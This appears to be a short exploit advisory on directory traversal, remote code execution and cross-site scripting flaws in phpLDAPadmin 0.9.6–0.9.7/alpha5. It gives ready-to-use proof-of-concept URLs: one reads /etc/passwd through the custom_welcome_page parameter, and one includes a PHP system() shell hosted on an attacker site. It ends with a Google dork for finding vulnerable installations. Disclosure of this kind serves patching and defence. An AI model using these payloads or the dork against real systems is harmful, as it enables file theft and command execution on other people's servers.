phpLDAPadmin versions 0.9.6 through 0.9.7/alpha5 suffer from directory traversal, remote code execution and cross site scripting vulnerabilities. Detailed exploitation provided.
72a0a1106d2ca25cc4bbd9000f4fc9071da5e7057f2e5999d828b382dd4ebcc1
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-identifier">phpLDAPadmin 0.9.6 - 0.9.7/alpha5 (possibly prior versions) system disclosure,
remote code execution, cross site scripting
software:
author site: http://phpldapadmin.sourceforge.net/
description: phpLDAPadmin is a web-based LDAP client. It provides easy,
anywhere-accessible, multi-language administration for your LDAP server
if unpatched and vulnerable, a user can see any file on target system, poc:
http://[target]/[path]/phpldapadmin/welcome.php?custom_welcome_page=../../../../../../../../etc/passwd
a user can also execute arbitrary php code and system commands:
http://[target][path]/phpldapadmin/welcome.php?custom_welcome_page=http://[evil_site]/cmd.gif
where cmd.gif is a file like this:
<?php system('[some_command]); ?>
also a user can craft a malicious url to include malicious client side code that
will be executed in the security contest of the victim browser
googledork: phpLDAPadmin intitle:phpLDAPadmin filetype:php inurl:tree.php | inurl:login.php | inurl:donate.php
rgod
site: http://rgod.altervista.org
email: retrogod at aliceposta.it
</span></span>
</code></pre>